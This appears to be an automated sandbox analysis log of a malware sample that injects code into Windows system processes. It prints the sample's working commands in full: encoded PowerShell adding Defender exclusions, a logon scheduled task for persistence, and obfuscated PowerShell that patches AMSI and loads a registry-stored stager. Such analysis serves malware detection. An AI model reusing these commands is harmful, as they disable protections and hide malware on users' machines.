Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\Install.exeAPI call chain: ExitProcess graph end nodegraph_1-3376
Source: C:\Users\user\AppData\Roaming\34432.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00405C49 GetTempPathW,DeleteFileW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,FindNextFileW,FindClose,1_2_00405C49
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_00406873 FindFirstFileW,FindClose,1_2_00406873
Source: C:\Users\user\Desktop\Install.exeCode function: 1_2_0040290B FindFirstFileW,1_2_0040290B
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140006E1C FindFirstFileExW,22_2_0000000140006E1C
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400073C8 FindFirstFileExW,39_2_00000001400073C8
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0D0E4 FindFirstFileExW,42_2_000001AFDDD0D0E4
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBD0E4 FindFirstFileExW,44_2_00000240B2BBD0E4
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0D0E4 FindFirstFileExW,47_2_000001CAF3D0D0E4
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4D0E4 FindFirstFileExW,49_2_000001B8BFF4D0E4
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000000140005D5C
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400090E0 GetProcessHeap,22_2_00000001400090E0
Source: C:\Users\user\AppData\Roaming\34432.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Windows\System32\dllhost.exeProcess token adjusted: Debug
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
Source: C:\Users\user\AppData\Roaming\34432.exeMemory allocated: page read and write | page guardJump to behavior
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_00000001400021B8 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,22_2_00000001400021B8
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140002CF4 SetUnhandledExceptionFilter,22_2_0000000140002CF4
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140005D5C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000000140005D5C
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_0000000140002B10 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,22_2_0000000140002B10
Source: C:\Windows\System32\nslookup.exeCode function: 22_2_000000014000235C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,22_2_000000014000235C
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140002338 SetUnhandledExceptionFilter,_invalid_parameter_noinfo,39_2_0000000140002338
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_0000000140002C90 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_0000000140002C90
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_00000001400024DC SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,39_2_00000001400024DC
Source: C:\Windows\System32\dllhost.exeCode function: 39_2_000000014000624C RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,39_2_000000014000624C
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000001AFDDD09098
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,42_2_000001AFDDD08450
Source: C:\Windows\System32\winlogon.exeCode function: 42_2_000001AFDDD0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,42_2_000001AFDDD0BEC8
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB8450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,44_2_00000240B2BB8450
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BB9098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00000240B2BB9098
Source: C:\Windows\System32\lsass.exeCode function: 44_2_00000240B2BBBEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,44_2_00000240B2BBBEC8
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D08450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,47_2_000001CAF3D08450
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D09098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001CAF3D09098
Source: C:\Windows\System32\svchost.exeCode function: 47_2_000001CAF3D0BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,47_2_000001CAF3D0BEC8
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF49098 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001B8BFF49098
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF48450 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,49_2_000001B8BFF48450
Source: C:\Windows\System32\svchost.exeCode function: 49_2_000001B8BFF4BEC8 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,49_2_000001B8BFF4BEC8

HIPS / PFW / Operating System Protection Evasion

Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionExtension @('exe','dll') -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Windows\System32\cmd.exe	Process created: Base64 decoded Add-MpPreference -ExclusionPath @($env:UserProfile,$env:SystemDrive) -Force
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory allocated: C:\Windows\System32\nslookup.exe base: 140000000 protect: page execute and read and write
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000 value starts with: 4D5A
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 240B2B80000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2C633850000 value starts with: 4D5A
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\winlogon.exe EIP: DDCD35D0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\lsass.exe EIP: B2B835D0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: F3CD35D0
Source: C:\Windows\System32\dllhost.exe	Thread created: C:\Windows\System32\svchost.exe EIP: BFF135D0
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 400000
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exe	Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe base: 4CF1008
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140000000
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140001000
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14000E000
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140019000
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14001B000
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14001C000
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 14001D000
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 140056000
Source: C:\Users\user\AppData\Roaming\34432.exe	Memory written: C:\Windows\System32\nslookup.exe base: 44EB131010
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140000000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140001000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14000E000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 140018000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14001A000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14001B000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14001C000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: 14003F000
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Memory written: C:\Windows\System32\dllhost.exe base: EE637B6010
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\winlogon.exe base: 1AFDDCD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\lsass.exe base: 240B2B80000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1CAF3CD0000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\svchost.exe base: 1B8BFF10000
Source: C:\Windows\System32\dllhost.exe	Memory written: C:\Windows\System32\dwm.exe base: 2C633850000
Source: 34432.exe.1.dr, u200f????????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 2.3.ChiefKeefofficialnaxyi_crypted(6).exe.2670000.0.unpack, u0003u2006.cs	Reference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: chrome.exe.4.dr, u200f????????????????????????????????????????.cs	Reference to suspicious API methods: ('?????????????????????????????????????????', 'WriteProcessMemory@kernel32.dll'), ('?????????????????????????????????????????', 'VirtualAllocEx@kernel32.dll')
Source: 5.2.AppLaunch.exe.400000.0.unpack, u0003u2006.cs	Reference to suspicious API methods: ('\\x02', 'LoadLibrary@kernel32.dll'), ('\\x02', 'GetProcAddress@kernel32.dll')
Source: C:\Users\user\AppData\Roaming\34432.exe	Thread register set: target process: 7056
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread register set: target process: 2324
Source: C:\Users\user\AppData\Roaming\34432.exe	Process created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: unknown	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.EXE "function Local:oBYZxpoBuJDg{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$hCPAJCDcAnFqJq,[Parameter(Position=1)][Type]$NibVxWxTFc)$qKHXRLjxcQb=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$qKHXRLjxcQb.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');$qKHXRLjxcQb.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$NibVxWxTFc,$hCPAJCDcAnFqJq).SetImplementationFlags('Runtime,Managed');Write-Output $qKHXRLjxcQb.CreateType();}$uYKrZWxknTiUv=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$SpNyfScDlNPPHB=$uYKrZWxknTiUv.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$RRmRtbQVOsCwqbtFCRP=oBYZxpoBuJDg @([String])([IntPtr]);$CSrLsWTvUKtnfJeCoYnQHQ=oBYZxpoBuJDg @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$LbwxtlPJWDL=$uYKrZWxknTiUv.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$UsbtvKZkuSsHuw=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Load'+'LibraryA')));$GBWVSxTZRtiWMYLEL=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$LbwxtlPJWDL,[Object]('Vir'+'tual'+'Pro'+'tect')));$zcmbglj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UsbtvKZkuSsHuw,$RRmRtbQVOsCwqbtFCRP).Invoke('a'+'m'+'si.dll');$NtWqUAjxRFzIehWzj=$SpNyfScDlNPPHB.Invoke($Null,@([Object]$zcmbglj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$QZnCEHiAlz=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,4,[ref]$QZnCEHiAlz);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$NtWqUAjxRFzIehWzj,8);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($GBWVSxTZRtiWMYLEL,$CSrLsWTvUKtnfJeCoYnQHQ).Invoke($NtWqUAjxRFzIehWzj,[uint32]8,0x20,[ref]$QZnCEHiAlz);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: unknown	Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:JcVEStQtPhkP{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$jwjRgZFzaeZBQB,[Parameter(Position=1)][Type]$jXrdWylJno)$JkETjFsAcrF=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('ReflectedDelegate')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule('InMe'+'mory'+'Module',$False).DefineType('MyDelegateType','Class,Public,Sealed,AnsiClass,AutoClass',[MulticastDelegate]);$JkETjFsAcrF.DefineConstructor('RTSpecialName,HideBySig,Public',[Reflection.CallingConventions]::Standard,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');$JkETjFsAcrF.DefineMethod('Invoke','Public,HideBySig,NewSlot,Virtual',$jXrdWylJno,$jwjRgZFzaeZBQB).SetImplementationFlags('Runtime,Managed');Write-Output $JkETjFsAcrF.CreateType();}$lPmVEIqLxWSBJ=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals('System.dll')}).GetType('Microsoft.Win32.'+'Uns'+'afeNat'+'iveMetho'+'ds');$oknnqNPEawtCof=$lPmVEIqLxWSBJ.GetMethod('Ge'+'tPr'+'ocAdd'+'ress',[Reflection.BindingFlags]'Public,Static',$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$PfTqTVeTqNbzEtTZAwA=JcVEStQtPhkP @([String])([IntPtr]);$FBhryrsEcCEQMAYVVFmrjj=JcVEStQtPhkP @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$gdWNaSIjpXI=$lPmVEIqLxWSBJ.GetMethod('Get'+'Modu'+'leHan'+'dle').Invoke($Null,@([Object]('kern'+'el'+'32.dll')));$MwCkRVFOfjwTFV=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Load'+'LibraryA')));$PwfBMMcphOddVTLUY=$oknnqNPEawtCof.Invoke($Null,@([Object]$gdWNaSIjpXI,[Object]('Vir'+'tual'+'Pro'+'tect')));$FyAgKxj=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($MwCkRVFOfjwTFV,$PfTqTVeTqNbzEtTZAwA).Invoke('a'+'m'+'si.dll');$GiLFGjttEZsjytHxc=$oknnqNPEawtCof.Invoke($Null,@([Object]$FyAgKxj,[Object]('Ams'+'iSc'+'an'+'Buffer')));$XarcXAurwd=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,4,[ref]$XarcXAurwd);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$GiLFGjttEZsjytHxc,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($PwfBMMcphOddVTLUY,$FBhryrsEcCEQMAYVVFmrjj).Invoke($GiLFGjttEZsjytHxc,[uint32]8,0x20,[ref]$XarcXAurwd);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey('SOFTWARE').GetValue('nslookstager')).EntryPoint.Invoke($Null,$Null)"
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exitJump to behavior
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\Chrome\chrome.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exit
Source: C:\Users\user\AppData\Roaming\ChiefKeefofficialnaxyi_crypted(6).exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe "cmd" cmd /c powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA" & powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4ARQB4AHQAZQBuAHMAaQBvAG4AIABAACgAJwBlAHgAZQAnACwAJwBkAGwAbAAnACkAIAAtAEYAbwByAGMAZQA=" & exitJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\nslookup.exe C:\Windows\System32\nslookup.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "chrome" /tr "C:\Users\user\AppData\Roaming\Chrome\chrome.exeJump to behavior
Source: C:\Users\user\AppData\Roaming\34432.exeProcess created: C:\Windows\System32\cmd.exe cmd" cmd /c "C:\Users\user\AppData\Roaming\Chrome\chrome.exeJump to behavior
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell -EncodedCommand "QQBkAGQALQBNAHAAUAByAGUAZgBlAHIAZQBuAGMAZQAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAALQBGAG8AcgBjAGUA"
